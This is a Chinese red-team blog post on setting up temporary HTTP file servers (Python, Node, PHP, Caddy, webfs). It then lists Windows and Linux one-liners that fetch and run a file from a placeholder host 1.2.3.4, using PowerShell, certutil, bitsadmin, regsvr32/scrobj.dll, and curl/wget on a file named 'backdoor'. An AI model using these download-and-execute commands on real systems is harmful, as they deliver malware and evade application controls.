【红队战术】临时文件传输服务Web Server

于 2023-07-24 12:02:59 发布
阅读量266 收藏
点赞数
分类专栏: 红队战术 文章标签: 网络安全 安全 系统安全 web安全 安全威胁分析
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_34594929/article/details/131892991
版权

一、Python

临时 HTTP 静态服务器通常用于快速共享文件或在开发和测试环境中临时托管静态内容。以下是一些常见的临时 HTTP 静态服务器:

Python 自带的 HTTP 服务器,Python 提供了一个简单的内置 HTTP 服务器,可以使用以下命令在任何目录下启动:

python3 -m http.server

或在 Python 2 版本中:

python -m SimpleHTTPServer

二、Node.js 的 http-server

如果您安装了 Node.js,您可以使用 http-server 模块来启动一个简单的 HTTP 静态服务器:

npm install -g http-server
http-server

三、 PHP 内置的 HTTP 服务器:

在 PHP 5.4 之后的版本,PHP 提供了一个内置的 HTTP 服务器,可以使用以下命令启动:

php -S localhost:8000

四、caddy:

Caddy 是一个现代的 HTTP/2 静态文件服务器,可以快速设置并支持自动 HTTPS:

caddy file-server --browse

五、webfs工具:

webfs 是一个简单的轻量级工具,允许您通过 HTTP 协议来访问文件系统中的文件。
以下是在 Linux 上使用 webfs 创建临时 HTTP 静态服务器的步骤:

安装 webfs:

在大多数 Linux 发行版中,可以通过包管理器来安装 webfs。例如,在 Ubuntu/Debian 上,可以使用以下命令安装:sudo apt-get update 在输入sudo apt-get install webfs

启动 webfs:

安装完成后,使用以下命令来启动 webfs,并指定要托管的文件目录:

webfsd -p 8080 -r /path/to/your/static/files

其中,-p 参数用于指定要使用的端口号(在此示例中为 8080),-r 参数用于指定托管文件的根目录路径。访问静态文件:现在,临时 HTTP 静态服务器已经运行。您可以在浏览器中访问 http://localhost:8080(或使用服务器 IP 地址)来访问托管的静态文件。

六、在 Windows 中,您可以使用不同的命令来下载并执行文件:

使用 PowerShell

  • 这段 PowerShell 命令的意思是:从 http://1.2.3.4/5.exe 下载文件,保存到
    c:\download\a.exe,然后启动 c:\download\a.exe 这个文件。
powershell (new-object System.Net.WebClient).DownloadFile('http://1.2.3.4/5.exe','c:\download\a.exe');start-process 'c:\download\a.exe'

使用 certutil

  • 从 http://1.2.3.4/5.exe 下载文件,保存到 c:\download\a.exe,然后执行
    c:\download\a.exe 这个文件。
certutil -urlcache -split -f http://1.2.3.4/5.exe c:\download\a.exe&&c:\download\a.exe

使用 bitsadmin

  • 从 http://1.2.3.4/5.exe 下载文件,保存到 c:\download\a.exe,然后执行
    c:\download\a.exe 这个文件。
bitsadmin /transfer n http://1.2.3.4/5.exe c:\download\a.exe && c:\download\a.exe

请注意,bitsadmin 下载速度可能较慢。

使用 regsvr32

regsvr32 /u /s /i:http://1.2.3.4/5.exe scrobj.dll

在 Linux 中,您可以使用不同的命令来下载文件:

使用 Curl

curl http://1.2.3.4/backdoor -o backdoor

使用 Wget

wget http://1.2.3.4/backdoor

使用 Awk

首先使用以上列出的任意一条命令启动一个 HTTP Server,然后运行以下 Awk 命令:

awk 'BEGIN {
  RS = ORS = "\r\n"
  HTTPCon = "/inet/tcp/0/127.0.0.1/1337"
  print "GET /secret.txt HTTP/1.1\r\nConnection: close\r\n"    |& HTTPCon
  while (HTTPCon |& getline > 0)
      print $0
  close(HTTPCon)
}'

参考内容:

https://gist.github.com/willurd/5720255#webfs
https://paper.seebug.org/834/#windows

David_Jou
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
个人搭建临时web服务器Http File Server
03-06
个人搭建临时web服务器,给朋友下载自己的资源的好软件,特小巧,就俩文件,绿色的,^_^ Http File Server
ftb临时文件传输服务器,AirPortal - 临时文件传输服务
weixin_30868807的博客
08-05 1297
AirPortal-临时文件传输服务背景介绍说到文件传输,在以前我们想要一个什么文件,需要拿着U盘到电脑上面去下载,而蓝牙也是一种方式,可以让朋友打开蓝牙传送文件给自己,可惜速度太慢,而且也受到距离的影响,在这个快节奏的社会,谁会愿意等那么久。现在有了快传等手机app,什么东西都能传送,文件,app,视频等等都可以,甚至一些视频软件如爱奇艺等和手机QQ也推出了面对面快传的功能,速度也很给力。不过今...
临时文件服务器,临时文件服务
weixin_32501329的博客
07-30 306
**[点击查看源码](https://github.com/jan-bar/UpDownFile)**# UpDownFile简易上传下载文件服务器,针对场景为临时需要上传或下载单个文件,完成后直接关闭服务器就完事了。1. 可以使用url访问,会显示一个建议web页面,可以在这个web页面**上传下载**文件,以及进行文件的排序。2. 也可以使用wget或curl命令行工具上传下载文件,多种选择,...
清理文件服务临时文件
weixin_33851429的博客
06-06 150
最近,文件服务器经常遇到磁盘空间不足的情况,通过运行dir /a/s >>dir.txt导出数据,再使用EXCEL分析文件类型和大小,找出原因是由于用户没有安全意识,随意将自己的个人文件放在公共盘上,又没有及时清理,最终导致磁盘空间不足。 首先是将带有大量与工作无关的视频和音频的文件夹直接移走,这样暂时就释放一部分磁盘空间,但这种情况维持不了多久,“治标不...
临时文件服务器,关注你的Windows系统临时文件夹网络服务器 电脑资料(4页)-原创力文档...
weixin_35733852的博客
07-30 184
关注你的Windows系统临时文件夹网络服务器 电脑资料系统临时文件夹(位于操作系统所在文件夹\Temp)是 Windows 系统用来转储临时文件的地方,而且使用者多是一些 服务器 类型的软件,例如Exchange Server,它会经常地在该文件夹中创建一些类似LB*.TMP的临时文件,系统临时文件夹(位于操作系统所在文件夹\Temp)是Windows系统用来转储临时文件的地方,而且使用者多是一...
ATT&CK.红队战术漫谈.pdf
09-09
ATT&CK.红队战术漫谈
网络安全红队工具包总结
05-24
信息收集工具(自动利用工具、资产发现工具、目录扫描工具、子域名收集工具...等)、漏洞利用工具(主要CMS利用工具、中间件)工具等)、内网穿透工具、应急响应工具
红队攻防手册,红队攻防教程
最新发布
04-20
红队攻防教程是指针对网络和系统安全的实践性培训,旨在模拟真实的攻击场景并提供相关的防御技术。红队是一个模拟攻击团队,通过模拟真实的黑客攻击来测试组织的安全性,而蓝队则是负责防御和应对这些攻击的团队。 ...
红队渗透打点工具-FindUpload
03-07
FindUpload作为一款红队打点工具,其核心功能在于帮助渗透测试专家有效地查找和定位网络系统中的文件上传点与登录框,从而加速渗透测试流程,提高工作效率。 FindUpload的特性主要体现在以下几个方面: 1. **批量...
hfs临时服务
03-24
把本地资源作为临时服务
临时服务器,可以临时用自己的电脑做一个服务器,
07-24
临时服务器,可以临时用自己的电脑做一个服务器,用自己的IP做服务器,让别人可以下载自己电脑上的文件。
临时文件传输工具推荐
01-07
一、背景 在工作和学习过程中有时候需要临时传输文件,尤其是大文件。 此时如果使用某度网盘,由于你懂得的原因,下载非常慢。 因此需要寻找好用的替代方案。 下面介绍两个用过的不错的临时文件传输工具。 二、介绍 2.1 牛奶快穿 https://cowtransfer.com/ 优点:界面非常简洁,可以不用登陆即可添加文件获取取件码。 缺点:免费用户限制较多。 使用方式和火狐文件传输相似。 2.2 火狐文件传输 https://send.firefox.com/ 优点:品牌大,更靠谱、使用简单,免费容量更大,免费的下载次数比牛奶快传更多。 缺点:仍然有文件大小限制,不过最大 2.5 的文件限制也
webFS
02-10
webFS
Web FS-crx插件
04-04
语言:English 该扩展提供了一个浏览器内工具,用于组织Web资源(又称URL)。 此chrome扩展名在功能上等同于简单的文件系统。 这是您的Web浏览器的文件系统。 它为所有Web资源的分层组织提供了工作节奏,就像您的本地查找器可以帮助组织文件一样。 文件夹和子文件夹功能齐全。 此扩展还提供了一项特殊功能:一个读取队列,该读取队列按您遇到的顺序存储您选择的资源。 浏览网络时,请将您没有时间的有趣文档和页面立即存储到队列中,并在以后重新访问它们。 一旦您从队列访问页面,该页面便不在您的阅读列表中(除非您选择永久保存它)。
打开临时web服务
luminous_you的博客
09-30 239
php -s 0.0.0.0:9999 在本地打开9999端口
web服务器的临时文件夹,WEB-基于phpinfo的包含临时文件
weixin_42126865的博客
08-13 1011
— 从零开始的笔记 —— phpinfo+LFI —基于phpinfo的包含临时文件从N1CTF ezphp 的非预期解中知道的漏洞开始找资料学习利用前提LFI文件包含漏洞一个服务端的phpinfo页面原理先了解文件上传流程向服务器上任意php文件以multipart/form-data方式提交请求上传数据时,会生成临时文件,也就是说不需要一定有显性的上传功能也可以上传生成临时文件。下面向我们有的...
临时服务器部署和Navicat for MySQL 数据库搭建
m0_46965984的博客
04-05 1120
小程序前端项目对接上后端服务器,数据库和存储可以称为小程序的全栈开发。 以WAMP(Windows+Apache+MySQL+PHP)组合为例从零开始详解如何部署服务器,搭建数据库以及实现后端接口,基于前面的项目进行全栈开发。 现有项目导入 复制现有项目文件,修改名称为newsDemo_WAMP 导入 后端逻辑实现 后端逻辑实现包含服务器部署,数据库搭建以及接口的实现,以Windows+Apache+MySQL+PHP服务器环境为例进行示范。 小程序对于接口制作所使用的数据库,后端语.
CobaltStrike Beacon Staging Server 深度解析与扫描
由于完整的Beacon Payload可能过大,不适合一次性传输,因此首先发送一个较小的stager,stager随后会连接到Staging Server下载更复杂的完整Stage。这个过程确保了Payload能够适应不同的环境和条件。然而,Staging ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

David_Jou

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值